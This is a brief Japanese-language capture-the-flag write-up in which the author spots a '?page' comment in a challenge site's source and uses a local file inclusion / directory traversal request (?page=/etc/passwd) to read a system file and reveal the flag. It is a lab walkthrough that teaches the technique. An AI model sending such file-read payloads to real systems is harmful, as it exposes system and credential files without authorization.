Ada Loves to travel to places, London-Paris-Spain and discover more
Link: http://35.225.9.113/Doors/
URLにアクセスすると複数のphpページへのエントランスが表示される。
Explore Dora!!
site1.png
ソースの以下の部分に注目する。
~~~
[<em><a href="file1.php">file1.php</a></em>] - [<em><a href="file2.php">file2.php</a></em>] - [<em><a href="file3.php">file3.php</a></em>]
</div></h3>
</div>
<!-- ?page -->
<div class="clear">
</div>
~~~?pageなるコメントがなされている。
index.phpを指定したhttp://35.225.9.113/Doors/?page=index.phpにアクセスしてみる。
?page=index.php
site5.png
ファイルが読み込めている。
ディレクトリトラバーサルに狙いをつけて、/etc/passwdを取得してみる。
http://35.225.9.113/Doors/?page=/etc/passwdにアクセスするとflagが表示された。
flag
flag.png
